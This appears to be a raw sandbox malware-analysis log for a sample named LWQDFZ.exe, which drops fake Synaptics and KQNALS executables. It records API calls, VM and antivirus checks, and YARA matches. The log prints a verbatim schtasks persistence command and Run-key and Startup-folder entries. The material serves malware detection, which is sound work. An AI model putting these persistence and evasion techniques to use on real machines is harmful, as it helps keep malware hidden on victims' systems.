                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: LWQDFZ.exeStatic file information: File size 1686528 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_005020B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_005020B0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_004305A8 push ss; ret 2_2_004305A9
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C7795 push ecx; ret 2_2_003C77A8
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0078BD45 pushad ; ret 3_2_0078BD47
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_00783E25 push eax; retf 3_2_00783E2D
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_00783A1D push edx; retf 3_2_00792FB9
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_0544CFA4 push D40544D5h; iretd 3_2_0544CFA9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_007005A8 push ss; ret 9_2_007005A9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00697795 push ecx; ret 9_2_006977A8
                              Source: initial sampleStatic PE information: section name: UPX0
                              Source: initial sampleStatic PE information: section name: UPX1

                              Persistence and Installation Behavior

                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\AIXACVYBSB\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeFile created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeJump to dropped file
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\Users\user\Desktop\._cache_LWQDFZ.exeJump to dropped file
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\ProgramData\Synaptics\RCXFBD9.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file

                              Boot Survival

                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MHDFGY.lnkJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MHDFGYJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BF78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_003BF78E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_00407F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00407F0E
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068F78E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,9_2_0068F78E
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006D7F0E IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,9_2_006D7F0E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C1E5A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_003C1E5A
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                              Malware Analysis System Evasion

                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeWindow / User API: threadDelayed 4236Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeWindow / User API: foregroundWindowGot 1363Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeAPI coverage: 6.7 %
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeAPI coverage: 4.0 %
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exe TID: 7440Thread sleep time: -42360s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8044Thread sleep time: -6420000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeThread sleep count: Count: 4236 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000002.00000002.3037281317.00000000042E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000002.3020785623.0000000003488000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000008.00000002.3022295381.00000000037F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ._cache_LWQDFZ.exe PID: 7436, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 7632, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\MHDFGY.vbs, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BDD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_003BDD92
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003F2044
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_003F219F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003F24A9
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_003E6B3F
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_003E6E4A
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_003EF350
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EFD47 FindFirstFileW,FindClose,2_2_003EFD47
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003EFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_003EFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_006C2044
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,9_2_006C219F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006C24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_006C24A9
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,9_2_006B6B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006B6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,9_2_006B6E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,9_2_006BF350
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BFD47 FindFirstFileW,FindClose,9_2_006BFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_006BFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,9_2_006BFDD2
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_0068DD92 GetFileAttributesW,FindFirstFileW,FindClose,9_2_0068DD92
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_003BE47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile opened: C:\Users\userJump to behavior
                              Source: Amcache.hve.23.drBinary or memory string: VMware
                              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.23.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.23.drBinary or memory string: VMware, Inc.
                              Source: KQNALS.exe, 0000000D.00000003.1545066238.000000000142F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 17108353S17108387S17108402S17108362S17108391S17108405S17108402S17108355S17108404S17108404S17108393S17108404VMWar&Prod_VMware_SA
                              Source: Amcache.hve.23.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.23.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.23.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.23.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: KQNALS.exe, 0000000D.00000003.1536359255.00000000013D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                              Source: ._cache_LWQDFZ.exe, 00000002.00000002.3025403510.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.000000000074D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.23.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.23.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.23.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.23.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.23.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.23.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.23.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: Amcache.hve.23.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.23.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.23.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.23.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.23.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                              Source: Amcache.hve.23.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.23.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.23.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.23.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.23.drBinary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.23.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.23.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: ._cache_LWQDFZ.exe, 00000002.00000002.3025403510.0000000000F72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
                              Source: Amcache.hve.23.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeAPI call chain: ExitProcess graph end nodegraph_2-103884
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeAPI call chain: ExitProcess graph end nodegraph_2-103137
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003F703C BlockInput,2_2_003F703C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_003A374E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_003D46D0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_005020B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_005020B0
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003CA937 GetProcessHeap,2_2_003CA937
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_003C8E3C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C8E19 SetUnhandledExceptionFilter,2_2_003C8E19
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00698E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00698E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeCode function: 9_2_00698E19 SetUnhandledExceptionFilter,9_2_00698E19
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DBE95 LogonUserW,2_2_003DBE95
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003A374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_003A374E
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E4B52 SendInput,keybd_event,2_2_003E4B52
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003E7DD5 mouse_event,2_2_003E7DD5
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\Users\user\Desktop\._cache_LWQDFZ.exe "C:\Users\user\Desktop\._cache_LWQDFZ.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_003DB398
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003DBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_003DBE31
                              Source: ._cache_LWQDFZ.exe, KQNALS.exeBinary or memory string: Shell_TrayWnd
                              Source: ._cache_LWQDFZ.exe, 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp, KQNALS.exe, 00000009.00000002.1576283717.000000000071E000.00000040.00000001.01000000.00000009.sdmp, KQNALS.exe, 0000000D.00000002.1548134182.000000000071E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C7254 cpuid 2_2_003C7254
                              Source: C:\Users\user\Desktop\LWQDFZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003C40DA GetSystemTimeAsFileTime,__aulldiv,2_2_003C40DA
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_0041C146 GetUserNameW,2_2_0041C146
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003D2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_003D2C3C
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeCode function: 2_2_003BE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_003BE47B
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: Amcache.hve.23.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.23.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.23.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.23.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                              Source: Amcache.hve.23.drBinary or memory string: MsMpEng.exe
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              Source: Yara matchFile source: Process Memory Space: ._cache_LWQDFZ.exe PID: 7436, type: MEMORYSTR
                              Source: Yara matchFile source: LWQDFZ.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.LWQDFZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: LWQDFZ.exe PID: 7352, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7464, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXFBD9.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: KQNALS.exe, 00000014.00000002.1918681012.000000000071E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: KQNALS.exe, 00000014.00000002.1938661920.000000000435C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                              Source: KQNALS.exeBinary or memory string: WIN_XP
                              Source: KQNALS.exe, 00000010.00000003.1713804910.00000000048E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81J
                              Source: KQNALS.exe, 00000011.00000002.1823458810.00000000046AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81h
                              Source: KQNALS.exeBinary or memory string: WIN_XPe
                              Source: KQNALS.exe, 0000000D.00000002.1569025019.00000000047EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81n>
                              Source: KQNALS.exeBinary or memory string: WIN_VISTA
                              Source: KQNALS.exeBinary or memory string: WIN_7
                              Source: KQNALS.exeBinary or memory string: WIN_8
                              Source: KQNALS.exe, 00000009.00000003.1514358348.00000000045DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81W
                              Source: Yara matchFile source: Process Memory Space: ._cache_LWQDFZ.exe PID: 7436, type: MEMORYSTR

                              Remote Access Functionality

                              Source: Yara matchFile source: Process Memory Space: ._cache_LWQDFZ.exe PID: 7436, type: MEMORYSTR
                              Source: Yara matchFile source: LWQDFZ.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.LWQDFZ.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000003.00000003.1511897808.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1390370601.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: LWQDFZ.exe PID: 7352, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 7464, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXFBD9.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\AIXACVYBSB\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
